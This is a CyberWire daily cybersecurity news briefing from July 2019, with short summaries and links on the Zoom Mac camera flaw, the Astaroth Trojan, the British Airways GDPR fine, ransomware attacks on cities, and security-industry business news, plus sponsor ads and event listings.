skip navigation

More signal. Less noise.

Visit LookingGlass Cyber Solutions at BlackHat USA 2019

There are many weapons to choose from when it comes to cybersecurity solutions providers – and you must choose wisely. With LookingGlass Cyber Solutions as your security provider, its “Game Over” for threat actors trying to infiltrate your network. To learn more about our solutions, visit our experts at the LookingGlass Network & Chill Lounge, Mandalay Bay South, Palm A on level 3, August 7 & 8. Take a break from the hectic show floor for old school video games, happy hour from 3-7 PM, and a demo tailored to your organization’s security needs.

Daily briefing.

Researcher Jonathan Leitschuh reports a serious vulnerability in Zoom's Mac video-conferencing tool that allows "any website to forcibly join a user" to a call, complete with camera access.

Microsoft warns that a campaign using the fileless Astaroth information-stealing Trojan is underway. Astaroth lives off the land, which can render detection difficult. On the other hand, as BleepingComputer quotes Microsoft, anomalous behavior might betray Astaroth to systems looking for suspicious behavior.

ESET identifies a campaign using torrents to distribute the familiar GoBot2 backdoor. The bait consists of Korean movies and television shows; most of the victims have been in South Korea. 

The fine the UK's Information Commissioner's Office levied against British Airways for a September databreach is confirmed to be £183 million (roughly $229 million), far exceeding the ICO's previous record of £500,000, Forbes observes. High as it is, the fine is shy of the 4% of annual turnover the ICO could have taken. In British Airways' case, 4% would have amounted to £500 million. The airline, which points out that it disclosed the breach within a day of discovery and has since found no sign of large-scale criminal exploitation, intends to appeal. The ICO apparently intends the penalty as a deterrent: any site that handles personal information should take careful note.

NSA's Inspector General rendered the agency's required annual report to Congress. It sees Fort Meade struggling with many of the same cybersecurity issues that concern other Government agencies: no "serious or flagrant problems or abuses," but some "significant" issues.


Today's issue includes events affecting China, Croatia, European Union, Finland, Republic of Korea, Russia, Slovakia, United Kingdom, United States.

Bring your own context.

Open source software is of course pervasive and usually effectively inescapable. But it can bring problems along with it.

"One of the vulnerabilities that we saw last year - and this is right now top of the leaderboard, we've never seen it quite this striking - is a vulnerability that was in FreeBSD. And so, this particular application was using a very old version of FreeBSD that had a vulnerability that was disclosed in May of 1990. Or the way we put it, probably it's older than some of the developers working on modern code."

—Tim Mackey, principal security strategist within the Synopsys Cyber Research Center, on the CyberWire's Research Saturday, 6.29.19.

Provenance and patching can be problematic.


Modernizing security analytics and operations with SOAPA.

Security operations is held back by the compromises of existing security analytics solutions, and throwing more money and time at the problem isn’t helping. Instead, you are left dealing with an army of point tools, exponential data growth, lack of context... the list goes on.

It's time to take a new approach to security analytics - explore how Devo can help evolve your SOC in this report by ESG.

In today's podcast, out later this afternoon, we speak with our partners at the Johns Hopkins University Information Security Institute, as Joe Carrigan describes security issues with D-Link routers. Our guest, Martin Mckeay from Akamai, discusses their most recent State of the Internet report.

And Recorded Future's latest podcast, produced in partnership with the CyberWire, is up. In this episode, "Threat Intelligence for the OSINT Curious," Micah Hoffman, principal consultant at Spotlight Infosec, shares insight into the growing availability and importance of open source intelligence.

Cyber Security Summits: DC on July 16 and in Chicago on August 27 (Washington, DC, United States, July 16, 2019) Register for reduced admission to the Cyber Security Summit with promo code cyberwire19 for $95 admission ($350 without code). Sr. Level Executives are invited to learn about the latest threats & solutions in Cyber Security from experts from The FBI, The U.S. DOJ, Verizon, Center for Internet Security, IBM and more. Breakfast, Lunch & Cocktail Reception are included with your admission. Passes are limited, secure yours today.

RSA Conference 2019 Asia Pacific & Japan (Singapore, Republic of Singapore, July 16 - 18, 2019) Join industry leaders and peers at the region’s leading cybersecurity event. Learn the latest issues and solutions, stay on top of new regulations, demo cutting-edge products, expand your skills and grow your personal network. Register now.

XM Cyber is coming to Black Hat (Las Vegas, Nevada, United States, August 3 - 8, 2019) Visit XM Cyber at our booth 875, to experience the first fully automated APT simulation platform to Simulate, validate and remediate hackers’ path to organizational critical assets.

Wicked6 Cyber Games (Las Vegas, Nevada, United States, August 8, 2019) Wicked6 is a fundraiser and cybersecurity exhibition in a thrilling esports arena in Las Vegas on August 8, 2019. It’s a week when cybersecurity leaders from around the world come to Las Vegas, and all are welcome to come by to experience this exciting and unique cyber competition as a player, sponsor, or avid fan. Wicked6 will raise funds for the Women’s Society of Cyberjutsu, a national 501(c)(3) nonprofit that promotes training, mentoring and more to advance women and girls in cybersecurity careers.

Cyber Attacks, Threats, and Vulnerabilities

Croatian government targeted by mysterious hackers (ZDNet) Government agencies targeted with never before seen malware payload — named SilentTrinity.

Malicious campaign targets South Korean users with backdoor-laced torrents (Posilan Ltd) ESET researchers have discovered a malicious campaign distributing a backdoor via torrents, with Korean TV content used as a lure Fans of Korean TV should be on the lookout for an ongoing campaign spreading malware via torrent sites, using South Korean movies and TV shows as a guise. The malware allows the attacker to connect …

Malicious campaign targets South Korean users with backdoor-laced torrents | WeLiveSecurity (WeLiveSecurity) ESET researchers dissect a malicious campaign that targets mainly South Korean users and spreads a backdoor via torrents, using local TV content as a lure.

Zoom Zero Day: 4+ Million Webcams & maybe an RCE? Just get them to visit your website! (Medium) Vulnerability in the Mac Zoom Client allows any malicious website to enable your camera without your permission. The flaw potentially…

Serious Zoom security flaw could let websites hijack Mac cameras (The Verge) Not good

Microsoft Discovers Fileless Astaroth Trojan Campaign (BleepingComputer) A fileless malware campaign used by attackers to drop the information stealing Astaroth Trojan into the memory of infected computers was detected by Microsoft Defender ATP Research Team researchers.

Microsoft warns about Astaroth malware campaign (ZDNet) New hard-to-detect Astaroth campaigns spotted using fileless execution and living-off-the-land techniques.

Report: Fieldwork Software Leaks Sensitive Customer Data (vpnMentor) vpnMentor‘s research team found a leak in the Fieldwork software database. Noam Rotem and Ran Locar, the heads of our cybersecurity research team, found ...

More than 1,000 Android apps harvest data even after you deny permissions (CNET) The apps gather information such as location, even after owners explicitly say no. Google says a fix won’t come until Android Q.

Dridex Banking Trojan, RMS RAT Dropped via Fake eFax Messages (BleepingComputer) Researchers from Cofense have discovered a new malspam campaign that delivers fake eFax messages designed to drop a banking Trojan and RAT cocktail via malicious Microsoft Word document attachments.

Superhuman’s Superficial Privacy Fixes Do Not Prevent It From Spying on You (Mike Industries) Last week was a good week for privacy. Or was it? It took an article I almost didn’t publish and tens of thousands of people saying they were creeped out, but Superhuman admitted they were wrong and reduced the danger that …

Who’s Behind the GandCrab Ransomware? (KrebsOnSecurity) The crooks behind an affiliate program that paid cybercriminals to install the destructive and wildly successful GandCrab ransomware strain announced on May 31, 2019 they were terminating the program after allegedly having earned more than $2 billion in extortion payouts from victims. What follows is a deep dive into who may be responsible for recruiting new members to help spread the contagion.

A City Paid a Hefty Ransom to Hackers. But Its Pains Are Far From Over. (New York Times) Weeks after Lake City, Fla., was hit by a cyberattack, the phones are back on and email is working, but the city has not yet recovered all its files.

The Scene: Pirates Ripping Content From Amazon & Netflix (TorrentFreak) Traditionally, a major source of high-quality pirate releases has been retail discs, such as Blu-ray or DVD. Today, torrent and streaming sites are regularly fueled by content culled from streaming services such as Netflix and Amazon. Known online as WEB releases, these files are the product of a decryption process using tools mostly not intended for public use.

Cortana and Alexa, helpful assistants or security threat? (The Jerusalem Post) Technion student says there is a major cyber security risk between the two.

3 ways IoT devices compromise security (Fifth Domain) The National Institute of Standards and Technology released a report detailing the cybe security and privacy risks associated with the Internet of Things.

Vulnerability Summary for the Week of July 1, 2019 (CISA) The NCCIC Weekly Vulnerability Summary Bulletin is created using information from the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD). In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.  

Hacker Ransom Demands From Cities Are Growing (The Crime Report) “It is quite profitable for the actors to conduct these sorts of attacks on victims,” said FBI agent Adam Lawson. “At the end of the day, people are paying the ransoms.” The FBI received nearly 1,500 ransomware reports last year.

Rampant Ransomware Attacks: How Cybercriminals Target Governments (WBUR) Across the country, cybercriminals are locking up local government files until ransom is paid. We look at the growing threat of ransomware attacks.

County cyber attack: Database still down, but costs covered (Citizens' Voice) The effects of a May cyber-attack on the Luzerne County computer network are still being felt, though nearly all costs the county incurred thus far should be covered by insurance, according to county Manager David Pedri. The county real estate database —

Social Engineering: The Non-technical Strategy to a Successful Cyber Attack (GC Capital Ideas) Cyber threat actors and their techniques have evolved, but most attacks still contain elements of social engineering. Without complex tools, software or extensive knowledge about the security platform, social engineering is an effective, non-technical strategy used by cyber criminals. It relies primarily on human interaction to gain trust and manipulates people into breaking standard security …

Tackling the Issue of Online Gaming Credential Stuffing (Security Boulevard) Issues in the gaming industry can provide lessons on the threats we face now and what could happen in larger, more critical industries.

Security Patches, Mitigations, and Software Updates

July Patch Tuesday forecast: Rules are changing for companies with custom applications (Help Net Security) Development components may even be an issue for companies who contract or purchase applications from a vendor.

Cyber Trends

Half of organisations don’t think their clients’ data is sensitive, research finds (Bdaily Business News) More than half of organisations believe their own data is more valuable than that of their clients, despite a rise…

State of Application Security at S&P Global World's 100 Largest Banks (Immuniweb) 97 out of 100 largest banks are vulnerable to web and mobile attacks enabling hackers to steal sensitive data.

They Kinda Want to Believe Apollo 11 Was Maybe a Hoax (New York Times) Conspiracy theories were once deadly serious. On the internet, skepticism about the moon landing shows how the mood has shifted.


Reports find new Huawei web flaws, plus troubling links to Chinese intelligence (BGR) Huawei continues to find itself on the wrong end of a sustained negative news cycle, with some of the latest revelations in new reports including assertions that new Huawei web application flaws ha…

Kaspersky Re-Ups With INTERPOL to Fight Global Cybercrime (Channelnomics) Move extends an agreement first inked by Russian vendor in 2014

Orange completes the acquisition of SecureLink, reinforcing its cybersecurity operations in Europe (Orange) Orange announces today that it has completed the acquisition of 100% of SecureLink, the leading independent cybersecurity player in Europe. Since signing a binding agreement with the investment fund Investcorp in May 2019, Orange has obtained approval from the relevant authorities enabling it to complete the transaction for an enterprise value of 515 million euros.

Is Broadcom (AVGO) a Step Closer to Acquiring Symantec? (Yahoo) Broadcom's (AVGO) expanding product portfolio positions it well to address the needs of rapidly growing technologies like IoT and 5G.

Symantec acquisition would give Broadcom a 'potent combination,' Jim Cramer says (CNBC) "If [interim Symantec CEO] Rick Hill can set off a bidding war, that would be the cherry on top," Jim Cramer says.

Virginia firm wins $35M contract for tech work at AFRL in Rome (Central New York Business Journal) The U.S. Department of Defense has awarded CACI Technologies Inc. of Chantilly, Virginia, a more than $34.8 million cost-plus-fixed-fee contract to develop and test software agility and resiliency software/hardware for the Air Force Research Laboratory (AFRL) in Rome.

Carbon Black: Attractive Buy Before Q2 Earnings (Seeking Alpha) Carbon Black reported a very strong Q1 earnings in early May, with revenue growing 21% and cloud revenue growing 80%. Despite the Q1 beat, management only slightly raised full year guidance, implying a conservative approach to the year. Valuation remains a little under pressure and relatively cheap compared to other faster-growth software security names.

Splunk Is Still A Great Buying Opportunity (Seeking Alpha) Splunk offers a platform that helps users derive new insights from machine data. The company has YoY revenue growth of 37.5%, positive free cash flow and scores quite well on the Rule of 40. It is fairly valued relative to other software stocks.

KnowBe4’s Year-Over-Year Sales Skyrocket 50% Over Q2 2019 for Another (PRWeb) KnowBe4, the provider of the world’s largest security awareness training and simulated phishing platform, today announced a significant year-over-year sales

CrowdStrike Stock Is Still Rallying as Wall Street Raves About Cloud-Based Security (Barron's) A wave of Wall Street analysts picked up coverage of the newly public cloud-based security software company on Monday.

Oppenheimer outlines bull case on CrowdStrike (Seeking Alpha) Oppenheimer was one of the firms that started off coverage on CrowdStrike (NASDAQ:CRWD) with a bullish rating on its expectation for hypergrowth of over 30%.

Here's what Wall Street thinks about CrowdStrike, an unprofitable cybersecurity firm that raised more than $600 million in its June IPO (CRWD) | Markets Insider (Business Insider) Several Wall Street firms initiated coverage of cybersecurity provider CrowdStrike on Monday.  CrowdStrike raised $612 million in its IPO, and t...

Northrop Grumman Board Names Kathy J. Warden Chairman (Northrop Grumman Newsroom) The board of directors of Northrop Grumman Corporation (NYSE: NOC) has elected Kathy J. Warden as its chairman, effective August 1, 2019. Warden will serve as chairman, chief executive officer and president. Warden...

Products, Services, and Solutions

Zimperium Receives FedRAMP Authorization From US Federal Government (The Daily Nonpareil) Zimperium, the global leader in mobile threat defense (MTD), announced today that the Zimperium Federal Cloud has achieved a Federal Risk and Authorization Management Program (FedRAMP) Authorization.

Incident response at the speed of light: Cynet launches free offering for incident response service providers (Help Net Security) Cynet offers IR service providers to collect data, investigate and remediate threats on their customers’ environments with Cynet 360 platform for free.

Technologies, Techniques, and Standards

Cyber security risk ratings cannot accurately assess cyber risk across industrial ecosystems (Control Global) According to the Bitsight report, security ratings allow the electric utilities industry to accurately assess risk across their business ecosystem. However, cyber security ratings currently can’t address control system cyber security yet control systems are existential for any industrial organization. Until there is better understanding of the control system cyber risks, security ratings for industrial organizations are meaningless.

European power grids cooperate on cyber-security (SC Magazine) Aurélio Blanquet, the recently elected Chair of the European Network for Cyber Security (ENCS ) Assembly Committee, calls for harmonisation and cooperation, particularly to close skills gap.

At GDPR’s One Year Mark, Continued Compliance Efforts are Key and Can Help with CCPA Compliance (Cooley) With the EU General Data Protection Regulation (the “GDPR”) now over a year old, companies may feel that their data privacy challenges have settled down and that their GDPR work is complete.  …

Security Industry Association Releases ANSI-Approved CP-01 False Alarm Reduction Standard (Security Industry Association) SIA CP-01-2019 improves on the 2014 version and adjusts for current technologies; the new standard aims to reduce unnecessary police dispatches.

Mobile Device Authentication with Biometric-Based Access Bridges the Gap Between High-Security and Low-Friction, According to New Research | (MobileIron) EMA research, sponsored by MobileIron, reveals mobile devices are the future of digital ID; 84% of organizations plan to adopt new authentication solutions within next two years

Lost in Transaction: The end of risk? (Paysafe) Will biometrics replace passwords for online payment authentication in 2019?

Attackers turn the tables on incident response strategies (SearchSecurity) Incident response strategies are not enough to protect against attackers who have incident response counterstrategies. Find out how attackers persevere against well-prepared targets and how to keep the upper hand.

I tried and failed to quit Facebook. Here’s what I did instead (Fast Company) Despite Facebook’s annoyances and privacy violations, abandoning the largest community in human history may have more downsides than benefits.

Design and Innovation

Fingerprint On The Pulse: Biometrics On The Move In More Places Than One (Fingerprints) We may be halfway through 2019, but as the year hurtles onwards, it’s important to pause and reflect on the latest and greatest news from Q2.

Frank Abagnale Jr: cyber security will be an issue "until we get rid of passwords" (Information Age) How can organisations beat malware? Frank Abagnale Jr, the former con man, says we don't stand a chance "until we get rid of passwords".

ISPs call Mozilla ‘Internet Villain’ for promoting DNS privacy (Naked Security) ISPA has shortlisted Mozilla for the sort of award that, on the face of it, no tech company should be keen to win – 2019’s Internet Villain.

Our Commitment to Lead the Fight Against Online Bullying (Instagram) Our mission is to connect you with the people and things you love, which only works if people feel comfortable expressing themselves on Instagram. We know bullying is a challenge many face, particu…

Inside Facebook’s information warfare team (Silicon Valley Business Journal) The social media giant’s ‘info ops’ team is at the frontline of its war on disinformation. Staffed by former intelligence operatives, investigative journalists and hackers the team has become increasingly slick.

How Facebook Fought Fake News About Facebook (Bloomberg) Polling data and secretive projects – ‘Stormchaser’ and ‘Night’s Watch’ – helped the social media giant track public sentiment, and respond to it

If News Recommendation Algorithms Feel Broken, Try This App (WIRED) In an attempt to combat the echo-chamber effect of algorithm-driven news apps, the new iOS app Gem takes a unique approach to recommendations.

Research and Development

BAE nets $4.7M by DARPA to integrate machine learning into RF signals detection (UPI) The Defense Advanced Research Projects Agency has awarded BAE Systems a contract worth up to $4.7 million to integrate machine learning into intelligence gathering involving radio frequency signals.

Legislation, Policy, and Regulation

Finland brings cybersecurity to the fore as EU presidency commences (The Daily Swig) Hybrid security exercises planned to counter threats

Iran Launches New Military Command And Control Unit To Withstand U.S. Cyberattack (Forbes) Last month the U.S. used a cyber attack to compromise Iran's command and control systems. Now Teheran has launched a new battlefield communications system it claims is impervious to a repeat attack.

US criticism of ZTE project ‘very absurd’: Chinese Foreign Ministry (Global Times) China dubbed US criticism of a project by Chinese telecommunications company ZTE in Argentina irrational and absurd on Monday, saying the monitoring device deal should not be politicized for ulterior motives.

The Huawei threat: China considers data to be critical national infrastructure (TheHill) As large tech companies and totalitarian regimes perfect their ability to aggregate and harness data, they will better influence social behavior.

India doubts Huawei’s 5G security promises, but U.K. carriers all buy in (VentureBeat) Despite U.S. concerns over Huawei's telecom gear, the heads of foreign allies are at best mixed on whether to ban the inexpensive, ready-to-go hardware.

Facebook and Twitter have not been invited to White House social media summit, sources say (CNN) The White House has not extended invitations to Facebook and Twitter to attend its social media summit on Thursday, people familiar with the matter said.

NSA Releases Semi-Annual Report to Congress (Lawfare) The National Security Agency’s Office of the Inspector General released an unclassified version of its mandatory semi-annual report to Congress covering Oct. 1, 2018 to March 31, 2019. The full document is available here below.  

NSA Isn’t Always Following Its Own Cybersecurity Policies, Watchdog Says ( The NSA Inspector General found the agency has “room for improvement” in every IT security category outlined in FISMA.

NSA Still Grappling With Controls to Guard Against Surveillance Abuse (Government Executive) Watchdog also finds gaps in security of internal data systems.

Litigation, Investigation, and Law Enforcement

British Airways Hit With Record Fine Following 2018 Cyberattack (Forbes) BA is facing a record fine, showing the true cost of GDPR. Here’s what it means for the company, its investors and others who are hit by a cyberattack.

British Airways vows to fight record £183m data breach fine (The Telegraph) British Airways has vowed to fight a record fine of £183m for a customer data breach last year.

Finally, a watchdog with teeth: BA’s £183m fine shows that the ICO means business (The Telegraph) How do you know today's £183m fine on British Airways for a huge data theft from its website is a landmark ruling?

How The British Airways Breach Will Reveal The True Cost Of GDPR (Forbes) British Airways is the first major test case for ICO GDPR fines. What can we expect?

Dark web takedowns make good headlines, do little for security (CSO Online) Shutting down dark web marketplaces looks and feels good, but it hasn't significantly reduced risk. Worse, it drives cybercriminals to harder-to-track channels.

Security software company Eset sues Smer MP Blaha (Slovak Spectator) The company wants to protect its reputation from statements and videos Blaha has issued.

Lessons From An Israeli Company's Cybertech Patent Litigation (Mondaq) With origins dating back to 1996 and claiming more than $350 million in patent licensing revenue, Finjan Holdings is a frequent plaintiff in U.S. patent litigation. United States Intellectual Property Finnegan, Henderson, Farabow, Garrett & Dunner, LLP 9 Jul 2019

For a complete running list of events, please visit the Event Tracker on the CyberWire website.

Upcoming Events

Minneapolis Cybersecurity Conference (Minneapolis, Minnesota, USA, July 11, 2019) Data Connectors brings together security professionals to discuss mitigating risk and improving their overall security posture. Eight industry speakers, an FBI/NSA/DHS keynote speaker, and a CISO Panel...

Insider Threat Program Development - Management Training Course (Mountain View, California, USA, July 15 - 16, 2019) The Insider Threat Defense Group will hold our highly sought after Insider Threat Program (ITP) Development - Management Training Course, in Mountain View, California, on July 15-16, 2019. This comprehensive...

Raleigh Cybersecurity Conference (Raleigh, North Carolina, USA, July 18, 2019) Data Connectors brings together security professionals to discuss mitigating risk and improving their overall security posture. Eight industry speakers, an FBI/NSA/DHS keynote speaker, and a CISO Panel...

Cybertech Midwest 2019 (Indianapolis, Indiana, USA, July 24 - 25, 2019) Cybertech is the cyber industry’s foremost B2B networking platform featuring cutting-edge content by top executives, government officials, and leading decision-makers from the world of cyber. Our Cybertech...

Smoky Mountain Bigfoot Conference (Gaitlinsburg, Tennessee, USA, July 27, 2019) Join us for the first ever Smoky Mountain Bigfoot Conference. We have some of America's most experienced Bigfoot researchers and investigators including Cliff Barackman, Bigfoot Field Researcher and co-host...

Grow your brand and reach new customers.

Grow your brand and increase your customer base by educating our audience about your products, services, and events by advertising on The CyberWire. We’ve built trust with an influential (and often hard to reach) audience of CISOs, CSOs, and other senior execs in the security space, across a wide array of industry verticals. Learn more.

Be a part of the CyberWire story.

People ask us (a lot) how they can support what we do. We have our sponsorships and services, of course, but those are not always within every supporter's financial reach, or it might just not be the right time for you to do those things. That's why we launched our new Patreon site, where we've created a wider variety of support levels, each with some new benefits. Our patrons are important to our future, and we hope you'll consider becoming one. We invite you to become part of the CyberWire story. Become a patron today.